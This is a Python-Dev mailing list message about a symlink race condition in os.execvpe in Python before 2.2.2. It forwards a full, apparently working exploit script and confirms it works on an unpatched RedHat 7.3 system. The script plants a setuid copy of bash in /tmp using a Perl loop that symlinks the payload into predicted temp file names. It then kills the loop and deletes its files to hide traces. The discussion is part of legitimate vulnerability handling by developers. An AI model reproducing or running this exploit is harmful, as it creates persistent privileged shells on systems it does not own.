[Python-Dev] FWD: Python execvpe symlink race condition.

[logistix]

Not to beat a dead horse, but the exploit code is published at:

http://www.ad2u.gr/index.php?topic=Exploits

It does work on my (unpatched vmware) RedHat 7.3.  Although (as the
notice stated), it creates a suidshell as the user who runs the script,
not root.  It also needs to be modified to use python2 on RedHat

Here's the code:

#!/bin/sh


echo "Python < 2.2.2 Symlink Race Condition exploit"
echo "Access-=-Denied Networks (c) mzozd@ad2u.gr, 2003"
echo "This is a proof of concept code!!! For educational purposes only"

evilcmd="#!/bin/sh\ncp /bin/bash /tmp/.sh\nchmod 4755 /tmp/.sh\n"
status="??"

echo "Creating suidshell script"
echo -e $evilcmd > /tmp/runme.sh
chmod 755 /tmp/runme.sh

perl -e 'while (1) { open ps,"ps -ef | grep -v grep | grep -v PID |"; 
while (<ps>) {@args = split " ", $_;if (/python/) {$args[2] = "@";
symlink("/tmp/runme.sh","/tmp/$args[2]$args[1].0");}}}'&

echo "Building python file..."
echo -e "import os\nos.execvpe('echo',['echo','-n','.'],os.environ)" >
/tmp/python.py

echo "Be patient, it will take a few moments"
while [ "$status" != "ok" ] 
do
python /tmp/python.py
if test -e /tmp/.sh; then
status="ok"
fi
done

echo -e "\nYou got your suidshell..."
ls -al /tmp/.sh

echo "Cleaning environment"
killall -9 perl
rm -rf /tmp/runme.sh /tmp/*.0 /tmp/python.py